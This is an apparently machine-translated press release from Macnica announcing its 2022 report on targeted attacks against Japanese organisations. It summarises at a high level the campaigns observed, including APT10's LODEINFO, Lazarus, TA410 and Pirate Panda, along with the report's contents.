Macnica releases an investigation report on targeted attacks targeting Japanese companies and individuals in 2022 today ~Sharing targeted attack techniques hidden behind ransomware and contributing to Japan's security measures~

Macnica (headquarters: Yokohama, Kanagawa Prefecture; Representative Director and President: Kazumasa Hara; hereinafter referred to as Macnica) has published a research report on targeted attacks that landed in Japan in 2022, "The Reality of Targeted Attacks and Countermeasure Approaches, 7th Edition," and is releasing it today.

In fiscal 2022, the introduction of EDR (Endpoint Detection & Response) products, which are the latest security measures, has spread to domestic organizations, including overseas bases. observations were scattered. Targeted attacks have been observed and actively enlightened in Japan for about 10 years, but the attack methods of cyber crime groups using ransomware have changed to infiltration into corporate networks, and it has become a method of targeted attacks. There are more common points, and currently there are fewer differences in terms of countermeasures taken by security products. Against this background, the term “targeted attack” is often seen as a buzzword of the past in the security industry.

Unlike ransomware attacks, targeted attacks aimed at stealing information are difficult to detect and share information over a long period of time. However, as for the trend of targeted attacks, while there are industries that have been targeted continuously for about 10 years, there are also situations where attacks reach new targets such as manufacturing industries.

This report contains an analysis of attack campaigns that attempted to steal confidential information from Japanese organizations observed in 2022 for the purpose of alerting the public. In the current situation where targeted attacks targeting specific organizations continue to occur and vigilance is required, we hope that this report will serve as a reference for Japanese companies' security measures.

Macnica will continue to persistently analyze and raise awareness of targeted attacks that are gradually eroding the industrial competitiveness of Japanese companies, and strive to contribute, however small, to the development of the Japanese economy.

[The following is an excerpt from the report]

■ Attack timeline and industries where attacks were observed
In FY2022, continuing from the observation in FY2021, attacks using the LODEINFO malware of the APT10 attack group were actively observed in industries such as the media and security-related industries as before. In attacks using LODEINFO malware, in addition to Office macro files, disk image files in VHD format were used as files to be delivered, changes to regular executable files used for DLL sideloading, and obfuscation of loader DLLs. changes were confirmed. Compared to these, LODEINFO itself, which is a payload in memory, was only slightly updated. In addition, as part of an ongoing attack campaign, an attack was observed in which shortcut files were used as download commands targeting cryptocurrency-related organizations of the Lazarus attack group. For this observation, there was little change from the method reported around 2019. As newly observed attacks from 2022, we observed attack campaigns by Operation RestyLink, EneLink, and Earth Yako attack groups at security-related organizations. In addition, as a newly observed attack from FY2022, an attack using FlowCloud malware by the TA410 attack group, Pirate Panda (also known as Tropic Trooper, GouShe) was observed. These two attack campaigns were observed at Chinese bases of domestic manufacturing industries. Regarding the observation of these attacks, spear phishing emails and chat tool attachments were the main infection routes, except that the FlowCloud malware was infected from a USB memory. Until FY 2021, there were attacks such as the A41APT attack campaign that exploited vulnerabilities in public systems such as VPN devices, but as a feature of FY 2022, it was observed that the number of intrusions from public systems decreased. .

<Time Chart>

<Pie chart of target organizations (FY2022)>

In FY2022, we observed many attacks on security-related organizations as targets of the LODEINFO malware and Operation RestyLink attack campaigns. Also, in the attack campaign using the LODEINFO malware, although it was not observed once in FY2021, it was observed again in the media industry, where attacks had been observed until FY2020. Regarding the detection of attacks on domestic organizations in the manufacturing industry, we have observed concentrated attacks on our bases in China, and domestic companies doing business in China are using the techniques of attack groups such as TA410 and Pirate Panda in this report. I would appreciate it if you could refer to the measures.

■ Contents
・Introduction
・Timeline of attacks and industries in which attacks were observed
・Overview of attack
May 2022
July 2022
August 2022
September 2022
November 2022
March 2023
・New TTPs and RATs, etc. Pirate Panda China-based spear phishing attack Campaign using LODEINFO
・TTPs (tactics, techniques, procedures) for each attack group
・ Threat detection and mitigation measures considered from TTPs
Malware Delivery/Attack
Installed RAT, remote control (for C2 server)
・Detection indicator

[Click here for the public URL of the report]
https://www.macnica.co.jp/business/security/security-reports/143962/index.html

*Company names and product names mentioned in this text are trademarks or registered trademarks of Macnica and each company.
*The information published in the news release (including product price, specifications, etc.) is current as of the date of announcement. Please note that the information may be subject to change without prior notice.